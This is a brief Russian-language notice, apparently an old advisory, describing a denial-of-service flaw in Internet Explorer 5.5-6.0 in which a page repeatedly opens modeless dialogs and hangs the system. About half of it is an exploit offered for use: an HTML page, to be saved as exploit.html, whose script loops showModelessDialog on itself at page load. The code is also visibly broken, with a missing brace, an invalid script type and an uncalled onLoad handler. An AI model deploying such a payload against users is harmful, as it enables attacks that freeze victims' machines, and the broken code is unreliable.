Немодальный (modeless) метод диалога - диалоговое окно, которое продолжает отображать события, даже когда пользователь переключился к другим программам.
Проблема, найденная в Microsoft Internet Explorer, позволяет злонамеренному Web хосту
организовать DoS атаку на пользователя.
Если немодальный метод диалога, включенный в HTML документ, пропускает этот HTML документ в инициализированном цикле
- система виснет.
Узвимость найдена в IE 5.5-6.0.
Эксплоит
Назовите файл exploit.html, и вставте в него этот код
<html>
<head>
<script type="javascript">
function exploit() {
while(1) {
showModelessDialog("exploit.html");
}
</script>
</head>
<body onLoad="exploit">
</body>
</html>
